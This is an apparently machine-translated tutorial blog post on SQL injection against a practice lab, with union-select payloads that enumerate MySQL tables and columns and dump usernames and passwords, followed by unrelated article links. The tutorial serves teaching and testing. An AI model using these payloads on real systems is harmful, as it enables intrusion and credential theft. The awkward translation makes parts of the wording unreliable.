principle

SQL Injection is a form of attack , In this way of attack , Malicious code is inserted into the string , Then the string is passed to SQL Server To analyze and execute . Any composition SQL The procedure of the statement should be checked for injection , because SQL Server All syntactically valid queries it receives will be executed .

( From Microsoft SQL Inject , But here's the thing ,SQL Injection is not limited to SQL Server, Almost any database engine has this problem )

Generally use steps

1. Determine the injection point

Judging the injection point has various meanings , One is to find the location where injection may exist , 20. Judge whether injection can be carried out at this place . In the shooting range environment , We already know ,GET Parameters of id It is the point of interaction with the database , Next, judge whether it can be injected .

id by 1, Successful query , Echo normal



id by 1', Database error , Guess from the error message that the closing method is single quotation mark



id by 1' --+, Successful query , Echo normal , Confirm the guess ,



id Respectively 1' and 1=1 --+ and 1' and 1=2--+, By echoing the situation , Further judge whether it can inject





1=1 For Yongzhen , When 1 Successful query , if 1=1 Also successful query , Then the page returns to normal ,1=2 For eternal leave , So if 1=2 To be carried out , Then the page must return to abnormal . Return the result by comparing the two , It can be seen whether the change point can be injected .

2. Number of query judgment fields

In order to display the results we want on the page , We need to use joint queries , One of the conditions of joint query is to ensure that the number of fields in the previous and subsequent query statements is equal , therefore , We need to determine the number of fields to query .

It is generally used order by or union select as follows :





order by Greater than 3 The page does not return normally , Less than or equal to 3 Return to normal , It is known that the number of fields in the original query statement is 3. or



When we jointly query 4 Column time , Get the error that the query statement consists of different columns , Inquire about 3 Column time :



Successful query , The original query statement has only three columns .

3. Look up the database name 、 Version number 、 User name and other information

union The rule of joint query is to execute the second query when the current query fails , As we learned earlier, the query has three fields , Next, we will pass id by 0, The judgment is the echo position of the three fields .

Built in by the database version()database()user() Find the version number 、 Current database name and current user .

4. The query table name

We learned from our previous inquiry , The current database version is 5.5.53, stay MySQL5.5 Later versions have built-in databases information_schema. It stores all the table names in the database 、 Field name and other information . Thus, query statements can be constructed , Get table name .

payload:?id=0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+

there group_concat() by SQL Statement built-in aggregate function , It is used to output the result of the query as a string .

( Use payload:?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+

5. Query field name

Know all the table names , Next, select a table , Query all the field names .

payload:?id=0' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3--+

6. Query record content

With table name and field name , You can reveal the records in the database .

payload:?id=0' union select 1,group_concat(username),group_concat(password) from users --+

The above is general SQL Injection process , Of course, there are some things like error injection , Request header Injection 、select into outfile Write a sentence, Trojan horse and other gestures are not introduced . In the follow-up learning process, gradually add .

SQL More related articles on the principle and general steps of injection

  1. Sql Introduction to the basic principle of injection

    explain : All the contents of the article are excerpted from the experimental building course [Sql Introduction to the basic principle of injection ]~ Experimental principle Sql Injection attacks are done by transferring malicious Sql The query or add statement is inserted into the input parameter of the application , And backstage Sql Attack by parsing execution on the server , ...

  2. 【 Infiltration course 】 Chapter five -SQL Injection principle

    Ha ha ha , When it comes to injection . I want to talk about the principle of injection . This is what we said in the preface , So-called SQL Injection is , Bypass the database verification mechanism and execute directly SQL sentence . How to put it? , Let's start with a concept ! The difference between a website and a web page Simple web pages are static ...

  3. SQL The principle and harm of injection

    SQL Inject , It's through SQL Command insert into Web Form submit or input the query string of domain name or page request , Finally, to cheat the server to execute malicious SQL command , For example, many previous film and television websites leaked VIP Most of the member passwords are through WEB Form submit query character ...

  4. Java Learning notes 47(JDBC、SQL Injection attack principle and solution )

    JDBC:java Database connection to JDBC The essence is a set of API, Classes and interfaces defined by the development company Use here mysql drive , It's a set of class libraries , Implement the interface Driver class library , Implement interface rewriting methods , The database is operated by the driver JDBC Operation steps ...

  5. Introduction to primary safety ——SQL The principle and application of injection

    Tool introduction SQLMAP: An open source penetration testing tool , It can automatically detect and use SQL Inject a vulnerability to take over the database server . It's equipped with a powerful detection engine , Provide a lot of powerful functions for the final penetration tester , You can drag the library , Access to the underlying text ...

  6. Use JDBC Separate use Statement and PreparedStatement Come on MySQL Database for simple additions, deletions, changes, and SQL Injection principle

    One .MySQL Download and install the database https://www.mysql.com/ Click on DOWNLOADS, Pull to the bottom of the page , find MySQL Community(GPL)Downloads, Click on Choose ...

  7. Simple talk about mybatis To prevent SQL Injection principle

    mybatis How to prevent SQL Injected 1. Let's first look at the following two sql The difference between sentences : <select id="selectByNameAndPassword" parameterT ...

  8. 【 commend 】PDO prevent SQL Injection attack Principle analysis as well as Use PDO Precautions for

    We all know , As long as it is used properly PDO, It can basically prevent SQL The generation of Injection , This paper mainly answers the following questions : Why use PDO instead of mysql_connect? why PDO It can prevent injection ? Use PDO Anti injection should be special ...

  9. SQL Principle and prevention of injection

    1. What is? SQL Inject ? SQL Injection is one of the common network attacks , adopt SQL Statement to realize login without account , Illegally obtain or even tamper with the data in the database . 2. SQL Injected ideas (1) find SQL Injection location : (2) Determine the server type and ...

  10. SQL Principle of injection hole

    Security is very important in a system , In order to ensure security, many solutions are applied to the system , For example, set up a firewall to prevent the database server from being directly exposed to external visitors . Use the authorization mechanism of the database to prevent unauthorized users from accessing the database , These solutions can largely avoid ...

Random recommendation

  1. Js Verify Chinese character length

    The code is as follows : //Oracle Varchar2 One Chinese corresponds to 3 individual Byte, So use 3 individual x Replace var commentValue = commentValue.replace(/[^\x00-\xff]/ ...

  2. C++ Study note 1 —— The processing of two class files referencing each other

    First record some fragmentary knowledge points : 1. A class can be declared more than once , But it can only be defined once , That is, yes class B;  class B;  class B; ……;  class B {……};   It looks like . 2. One ...

  3. java Pen test (1)

    char Can a Chinese character be stored in type variable ? char Type variables are used to store Unicode Of encoded characters ,unicode The coded character set contains Chinese characters , therefore ,char Of course, Chinese characters can be stored in type variables . however , If a special Chinese character doesn't ...

  4. jpa Lazy loading exception

    1. Project background Overview Here's the thing , Used spring data jpa Project jeesite jeesite Lazy loading mode is used in the entity of . And more than one attribute in an entity class has lazy loading mode set . The project itself already exists ...

  5. Spring Implementation of transaction management : Programming and declarative transactions

    1. Last article explained Spring Propagation level and isolation level of transactions , And simple configuration of distributed transactions , Click back to see the last article 2. Programming transactions : Coding mode to achieve transaction management ( Code demonstration as JDBC Business management ) Spring Implement a programmed transaction , rely on ...

  6. ListView Click on the Item No response

    Not much to say , Code up : Here's the picture Something with a red box , android:descendantFocusability=”blocksDescendants” If not added , stay android Of 8.0 There is no sound when clicking on the mobile phone ...

  7. Linux Next Redis Installation and configuration

    1.Redis Installation stay Ubuntu System installation redis You can use the following command : $ sudo apt-get update $ sudo apt-get install redis-server ...

  8. UVA1329 Corporative Network

    Ideas Maintain the distance to the root with weighted parallel search set Code #include <cstdio> #include <algorithm> #include <cstring> #i ...

  9. Centos7 adopt SSH Use the key to realize secret free login

    Public Key The main charm of authentication is that it promises to establish a connection with a remote system without providing a password . Public Key Authentication is based on a pair of keys ,public key and private key,public key Yes ...

  10. python3.5: error while loading shared libraries: libpython3.5m.so.1.0: cannot open shared object file: No such file or directory

    python3.5 Installation error python3.5: error while loading shared libraries: libpython3.5m.so.1.0: cannot open sha ...